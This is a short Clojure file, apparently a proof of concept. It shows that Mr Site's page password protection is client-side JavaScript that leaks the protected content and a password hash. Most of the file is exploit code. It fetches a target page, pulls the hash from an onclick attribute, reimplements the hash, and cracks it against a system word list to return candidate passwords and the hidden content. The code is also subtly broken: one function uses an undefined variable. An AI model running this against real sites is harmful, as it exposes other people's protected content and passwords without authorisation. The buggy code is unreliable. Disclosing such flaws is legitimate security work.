Mr Site password protection vulnerability

core.clj

; Mr Site Password protection
; http://www.mrsite.com/videos/Tips_and_tricks_%E2%80%93_putting_a_password_on_your_web_pages/19525203
;
; The problem
; -----------
; For some reason Mr Site "secures" pages with Javascript client side password protection,
; instead of using HTTP basic authentication or with server side code. Anyone can click
; "view source" and view the secrets. Worse, the password hash is available so anyone could
; figure out the password used.
;
; Example
; -------
; The below code, given an url of a page using Mr Site's password protection returns a list of
; possible passwords and the secret content. It's complete overkill but there you go.
;  Usage - (whoops "http://some-url.com/pageXX.html")

(ns scratch.core
  (require [net.cgrand.enlive-html :as html])
  (use [clojure.java.io :only [reader]]))

(defn fetch [url]
  (with-open [rdr (clojure.java.io/reader url)]
    (html/html-resource rdr)))

(defn password-hash [resource]
  (->>
   (html/select resource [:div#test5 [:input (html/attr? :onclick)]])
   first :attrs :onclick
   (re-find #"\d+")
   Double.))

(defn make-hash [password]
  (reduce (fn [^double hash [i ch]]
            (+ (* hash i) i (int ch)))
          0 (map-indexed vector password)))

(def words (line-seq (reader "/usr/share/dict/words")))

(defn whoops [url]
  "Returns secret content and a list of possible passwords."
  (let [resource (fetch url)
        hash (password-hash resource)
        passwords (filter #(= hash (make-hash %)) words)
        content (apply str (html/emit* (html/select page [:div.content])))]
    {:passwords passwords :content content}))